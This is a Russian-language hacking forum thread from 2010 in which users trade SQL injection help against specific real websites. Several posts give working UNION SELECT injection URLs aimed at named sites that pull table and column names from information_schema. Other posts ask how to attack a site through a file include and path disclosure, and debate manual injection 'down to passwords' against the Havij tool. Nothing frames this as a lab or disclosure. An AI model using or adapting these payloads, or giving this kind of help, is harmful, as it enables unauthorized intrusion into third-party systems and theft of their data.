10.07.2010, 18:08
|
|
Новичок
Регистрация: 27.05.2010
Сообщений: 13
С нами:
8399502
Репутация:
0
|
|
Сообщение от попугай
Нажми Ctrl+U на клавиатуре и посмотри.
Press Ctrl+U on your keyboard and see
Благодарю вас, это работа
|
|
|
10.07.2010, 18:44
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
С нами:
9129884
Репутация:
240
|
|
Сообщение от happygirl
Пожалуйста, помогите мне, как добраться таблиц и столбцов с этого сайта. Я не могу использовать синтаксис union_
http://www.canal.qc.ca/recherche.php?type=domaine&domaine=2%27
0_о не понял в чем проблема?
http://www.canal.qc.ca/recherche.php?type=domaine&domaine=2%27+union+sele ct+1,2,3,4,5,concat_ws%280x3a,table_schema,table_n ame,column_name%29+from+information_schema.columns--+
|
|
|
|
10.07.2010, 20:26
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
С нами:
9157119
Репутация:
74
|
|
Привет.
Есть сайтик. На шаред хостинге стоит, в другой стране. Работает под управлением самописного движка (сорцев нет).
На сайтике есть один скриптик. Его вызов таков:
http://site/lol.php?p=name
этот скрипт инклюдит файл /pages/name.php (".php" подставляется автоматом).
Еще знаю путь к PHP (мне так кажется, выглядит как /usr/local/nf/php5/lib/php).
Еще кое что есть.
Скриптик, который как-то хитро выполняет запрос. Ему подставляешь число, а он делает выборку из базы (SQL) и выдает ссылку на файл. Если подставить ему, например, -1 в качестве номера, начинает срать кирпичами. Ничего особого там нет, если не считать полного раскрытия путей.
Что можно сделать, дорогие эксперты?
Спасибо.
|
|
|
|
10.07.2010, 20:52
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
По той информации, что ты предоставил, судить о наличии уязвимостей не возможно.
Либо задавай вопрос конкретнее, либо читай статьи.
|
|
|
|
11.07.2010, 05:40
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
С нами:
9709737
Репутация:
88
|
|
Помогите плиз сформировать строку иньекции, а то с выводом даже ошибки, а что-то ничего не прокатывает (
http://www.noracom24.eu/image.php?w=200&h=120&id='
|
|
|
|
11.07.2010, 06:08
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Сообщение от AKYLA
Помогите плиз сформировать строку иньекции, а то с выводом даже ошибки, а что-то ничего не прокатывает (
http://www.noracom24.eu/image.php?w=200&h=120&id='
Код:
http://www.noracom24.eu/image.php?w=200&h=120&id=1+and+1=2+union+select+group_concat%28table_name%29+from+information_schema.tables+where+table_schema=database%28%29+--+
там в картинке выводится
|
|
|
|
11.07.2010, 06:24
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
С нами:
9709737
Репутация:
88
|
|
Seravin
Сенкс, даже не подумал что так может быть...мда тут по ходу никак не поработаешь автоматизировано с ней, с таким выводом (
|
|
|
|
11.07.2010, 14:33
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
не знаю как вы но я никогда не использовал программы чтобы найти или автоматически раскрутить скул,
от этого одни минусы
1. вы не осваиваете sql инъекцию хорошо
2. вы доверяете программу которая может ошибиться
3. и этот взлом даже не можете считать вашим (это чистое мнение)
однажды я раскрутил скул до паролей, походу было два запроса и поэтому немного потрудилась над колонками..
потом скул даль программу havij которая считается крутой тулзой,и программа не смог раскрутить скул
sql инъекции бывают такими разными что программно раскрутить все это не реально(я так думаю)
вообщем дело ваше, простите за оффтоп(если это оффтоп)
|
|
|
|
11.07.2010, 14:48
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 25
С нами:
8395840
Репутация:
5
|
|
/showpost.php?p=2243635&postcount=14262
Актуально.
Konqi, иногда надоедают однотипные действия) Хотя самостоятельно лучше, да.
|
|
|
|
11.07.2010, 15:35
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Сообщение от Konqi
не знаю как вы но я никогда не использовал программы чтобы найти или автоматически раскрутить скул,
от этого одни минусы
1. вы не осваиваете sql инъекцию хорошо
2. вы доверяете программу которая может ошибиться
3. и этот взлом даже не можете считать вашим (это чистое мнение)
однажды я раскрутил скул до паролей, походу было два запроса и поэтому немного потрудилась над колонками..
потом скул даль программу
havij
которая считается крутой тулзой,и программа не смог раскрутить скул
sql инъекции бывают такими разными что программно раскрутить все это не реально(я так думаю)
вообщем дело ваше, простите за оффтоп(если это оффтоп)
когда тебе нужно просмотреть кучу баз и кучу таблиц, то ручками ты потеряешь довольно много времени, ну а если это можно сделать программно, то зачем же его терять? если программно не получилось, то тогда да, нужно уже руками делать
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
